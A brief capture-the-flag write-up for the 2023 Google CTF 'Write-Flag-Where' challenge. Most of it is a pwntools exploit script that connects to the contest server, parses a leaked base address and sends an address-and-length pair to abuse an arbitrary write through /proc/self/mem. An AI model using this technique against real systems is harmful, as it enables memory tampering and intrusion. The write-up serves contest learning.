Rating: 3.0

Solution

You can write any where in memory if you have access to file /proc/self/mem.

Exploit

from pwn import *
context.log_level='debug'
context.arch='amd64'
#context.terminal = ['tmux', 'splitw', '-h', '-F' '#{pane_pid}', '-P']
# p=process('./pwn')
p = remote("wfw1.2023.ctfcompetition.com",1337)
ru      = lambda a:     p.readuntil(a)
r       = lambda n:     p.read(n)
sla     = lambda a,b:   p.sendlineafter(a,b)
sa      = lambda a,b:   p.sendafter(a,b)
sl      = lambda a:     p.sendline(a)
s       = lambda a:     p.send(a)
# gdb.attach(p)
ru(b"shot.\n")
base = int(p.readuntil("-")[:-1],0x10)
print(hex(base))
target = base+0x21E0
sla("expire\n",hex(target)+" 120")
p.interactive()
Original writeup (https://github.com/n132/CTF-Write-Up/tree/main/2023-Google-CTF/WRITE-FLAG-WHERE).